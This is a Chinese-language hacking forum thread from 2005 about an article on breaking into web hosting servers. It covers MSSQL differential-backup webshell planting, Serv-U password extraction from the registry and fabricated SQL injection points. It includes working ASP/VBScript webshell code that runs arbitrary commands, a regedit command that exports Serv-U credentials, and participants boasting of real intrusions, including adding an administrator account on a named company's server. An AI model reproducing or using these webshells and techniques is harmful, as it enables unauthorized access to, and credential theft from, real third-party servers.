引用:

下面是引用yaqilles于2005-10-03 21:05发表的:
思路到是很好!不过我感觉这有点太巧了吧!
"mssql差异备份"
你是用什么权限?

这叫做无巧不成书嘛
文章里面已经说了啦
db_owner权限的呢~

引用:

下面是引用堕落青年于2005-09-30 20:33发表的:
我今天入侵了一个虚拟主机```用wsh执行命令，regedit /e "e:wwwaamima.ini" "HKEY_LOCAL_MACHINESOFTWAREcat softserv-u"
"e:wwwaamima.ini"是iis的目录，运行webshell里没反应（海洋06wsh可以看net user,和netstat -an）
请问运行那个命令要什么权限/？guest？user？还是怎么的？

这也是运气的成分
如果管理员把密码放到注册表里面，才能成功

最后补充
好象我没有得罪过什么人吧。。
为什么要这样来针对我呢？我只是在自己的成长过程中，发现了一些好的东西，写出来和大家一起分享一下，为了让其他人在入侵的时候更加多的一条路选择而已。其他的我不想说什么，文章如果是骗人的。我为什么要写呢？而且还要发在EST，EST，是一个我梦寐想加入的地方，我不会在这片净土上染上灰尘？
刚刚仔细想了一下，我的语气重了很多。在这里向wedxzaw道歉了。。

回snowdown：
webshell是db_owner权限，那注入也是db_owner，当然是webshell方便。其实从你这点来看，作者和你一样都只会用工具，而自己却不懂sql查询语句。文章中

第二点更是说明snowdown可笑的离普。谁都知道ServUDaemon.ini和注册表里存放的都是加密的密码，不信任何人都可以下个servu-5.0/servu-6.x进行测试，snowdown你骗人毕竟不是正道，自己下个servu自己测试测试吧，可能你连servu都没用过！

请问哪里可以找到下雨天的 那篇文章：serv_u FTP 再暴本地权限提升漏洞",
谢谢！

To wedxzaw:

引用:

webshell是db_owner权限，那注入也是db_owner，当然是webshell方便。其实从你这点来看，作者和你一样都只会用工具，而自己却不懂sql查询语句。

这句话什么意思?怎么会有这种观点呢?难道会用ASP木马或者PHP等CGI的木马就是会SQL语句了?是啊,我苯呀~不知道select,update,delete,insert,union,盼望大师您来教教我啊!

引用:

第二点更是说明snowdown可笑的离普。谁都知道ServUDaemon.ini和注册表里存放的都是加密的密码，不信任何人都可以下个servu-5.0/servu-6.x进行测试，snowdown你骗人毕竟不是正道，自己下个servu自己测试测试吧，可能你连servu都没用过！

可笑或者不可笑,骗人与不骗人其实和我无关吧!大哥!拜托你翻翻书好嘛~不要总是上来用这么过激的言论.
你去翻翻黑防第6期的下雨天[F.S.T]的那篇<<serv_u FTP 再暴本地权限提升漏洞>>文章,如果你说黑防和我一样白痴,和我一样骗人,那我就忍了~

PS:最后,想说一句话,技术讨论的地方不是狂吠不止的地方,人要有理性的说话,而不是像某种生物一样,THX.

忘了一点,刚才十二少说他碰到的是在注册表里存放加密的密码,我还是真的和作者一样幸运呢~
莫非这就传说中的人品问题?
所以要是说错了,请大家多多包涵~
(俺真的是见的全是明文存放在注册表里哦~没有骗人哟~)

有关第一点,你说你不会一点sql,就说明你的知识太少了,难怪这点都看不出.第二点,我只是提出我置疑的观点(也是很多人的观点).回答别人的问题不是用语言来击打对方,而是摆出有事实根据的说法,而不是讲人品问题。从这点也说明snowdown自身人品如何了，这也是很多人背后说snowdown的原因

引用:

有关第一点,你说你不会一点sql,就说明你的知识太少了,难怪这点都看不出.第二点,我只是提出我置疑的观点(也是很多人的观点).回答别人的问题不是用语言来击打对方,而是摆出有事实根据的说法,而不是讲人品问题。从这点也说明snowdown自身人品如何了，这也是很多人背后说snowdown的原因

是啊,是啊~还是您老厉害~我决定不和您在这里吠下去了~
莫非真的扯到我人品问题了?哎,闪人,闪人~

文章我也看了。也是不大明白andyower入侵的原理，ServU我还真没怎么用过，
看来应该测试下！对于创造一个SQL注入，我也觉得不如webshell直连方便！
路过，路过。。。

我拿过一个su`他的配置文件里`密码明文的！

我也遇到过download.it.com.cn原来就是的。
进去加了一个管理员帐号~
呵呵~~it.com.cn的好多管理密码就是部门拼音反过来写！

NO need to argue such a question like this, you can think about it and try to do like this
1)install serv-u 6 or another version and confige it to store password in the registry
2)make a server such as IIS in your own computer and try to follow the auther to hack it
3)you will got it, what the answer is!
by the way, understand SQL or not is not the problem to understand this article,toos is just a tools, it is simple and simple for user to use. there may be not one way to do something. if you want to know the answer, try it! [s:51]


--Administrators--
黑体部分为：单词拼写错误 语法错误 词法错误和不正规用法...中国人和中国人交谈时不妨用中文

>>谁都知道ServUDaemon.ini和注册表里存放的都是加密的密码

老兄只是使用了默认设置而已.
SERVU可以使用多种配置方法.其中包括对密码明文不进行加密
很多主机管理系统由于不知道SERVU的密码加密方法(SALT+MD5)
所以干脆用明文保存密码方便主机管理系统来增添和修改FTP帐户.

引用:

下面是引用wedxzaw于2005-10-03 22:17发表的:
还有，导出system.ini那部分，servu密码应该是md5加密的，怎么会是明文的。作者可以重现密码明文保存的环节吗？

我也见过serv-u的密码是明文保存在ini文件中的....

不对。
<script language="vbscript" runat=server>if request("#")<>"" then execute(request("#"))</script>
这句代码的成功率我在进的时候几乎都可以传上去。我没有必要说假话啊。你不信试试。在所有<% aspshell都不可以通过的时候传这个是最有效的。

汗 我也进了一次万网。。
您查询的IP:210.192.122.120
查询结果1：北京市 万网公司IDC
查询结果2：北京市
旁注 通过DVBBS搞得

请问我上传了cmd.exe到网站目录,我执行netstat -an的时候,Wscript.Shell拒绝访问,有什么办法解决吗？
小弟ASP还没入门..

对于楼主
最重要的2个组件可以用:Shell.Application ,WScript.Shell,也就是说WScript.Shell被改名了,但是还是存在的,这种小事难不到偶滴,马上弄了段代码上去,内容如下
<%
fpath = request("fpath")
if request("cmd")<>"" then
%>
<div align="center">
<ObjEct runat=sErvEr iD=Andyower scOpE=pagE
classiD="clsiD:72C24DD5-D70A-438B-8A42-98424B88AFB8">
  </ObjEct>
<textarea readonly cols=80 rows=20>
<%=Andyower.exec(fpath & " /c "+request("cmd")).stdout.readall%>
</textarea>

提交 cmd.asp?fpath=自己的cmd.exe的路径&cmd=命令.如图


这里有疑问...我碰到跟你一样的情况....就是失败..............什么原因?还请指点。........

Andyower
我支持你，问你问题的有些人真是看不惯，自己是个菜，还说别人是菜。
不想提了，路过。

对了，提一点，Andyower你说的是思路，非常不错，玩入侵就不要照般东西，要灵活运用。
　至少我玩万网是成功的~反正也进去几次了。

呵呵，ps某人，说人的时侯动动脑！
注入手件到另一台服务器里！我跟你打赌，你用手工的就没有我快！
虽然工具是别人的！但是你入侵的时侯我想请问一下你是不是每次都手工！
不说什么，就说注入,16位md5的密码现在很多网都在用，你去手工
功呀，那样我不知道你入侵一个站需要多长的时间！你要懂得人是活
的，入侵靠的是什么，不就是思路吗？说难听一点，就算你技术高，
你没经验，没思路，你能做什么～
再说白一点，你所懂的技术又是谁教你的呢，还不是人
家的技术，有本事就自已研究点技术出来！我晕死！

〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓
andyower
的思路总的来说是不错的。，差异备份用这个马：
<script language="vbscript" runat=server>if request("#")<>"" then execute(request("#"))</script>成功率是要高些，但是在这里可能也不行，因为数据库本来就有<%,备份了也会出错，
所以<script language="vbscript" runat=server>if request("#")<>"" then execute(request("#"))</script>也好不到哪里去。
前面某些人的评论带有攻击性和打击性，实在不爽，
讨论技术不应该这样。千万不要总是认为别人不行，自己牛X，说不定自己真正动手的时候还不如andyower
弟弟。


[s:46]  [s:46]  [s:46]

〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓

引用:

<%
fpath = request("fpath")
if request("cmd")<>"" then
%>
<div align="center">
<ObjEct runat=sErvEr iD=Andyower scOpE=pagE
classiD="clsiD:72C24DD5-D70A-438B-8A42-98424B88AFB8">
  </ObjEct>
<textarea readonly cols=80 rows=20>
<%=Andyower.exec(fpath & " /c "+request("cmd")).stdout.readall%>
</textarea>

提交 cmd.asp?fpath=自己的cmd.exe的路径&cmd=命令

好东西，终于又学了一招。

看看浏览器标题，晕了，老大没注意么，站点URL显示得好清楚。
下载的PDF文件字体蛮淡，眼睛⒏好，看不蛮清楚，还是认真看完了。

对了，fhod大哥不是在黑基干么到这里来逛拉，又要忙着办自己的站，还要忙着入侵，还要学习，
敬佩一下！

这次万网害死人了吧!既然让我得到了要进攻的网站的另外一台服务器.220.194.*.*,这台服务器是独立的,旁注过,没有成功,因为不存在另外的网站,这一次,看你往哪跑,一起把他拿下!因为有些原因,从现在开始不提供截图了,希望可以谅解.既然已经得到了数据库的帐号密码,而且他的网站是直接用asp连接上去的，这样说,一定会开了ms sql的端口的.用sql器连接上去,发现自己的权限是db_owner的权限，很多命令不能用，自己手工读去对方的web路径又太麻烦了,而且我也想看看他的结构,既然我有了sql帐号的密码.他的服务器上没有注入漏洞,我可以帮他伪造一个,伪造一个注入点，然后用nbsi来猜解其他的信息,速度会快很多的.


其实很多人都说这个思路好，你想一想，直接在sql查询器里提交快还是伪造注入点用nbsi猜快。很明显，说思路好的人其实自己也不懂。我觉得大家和作者都很应该好好反省么省，为什么连这么简单的东西都不懂。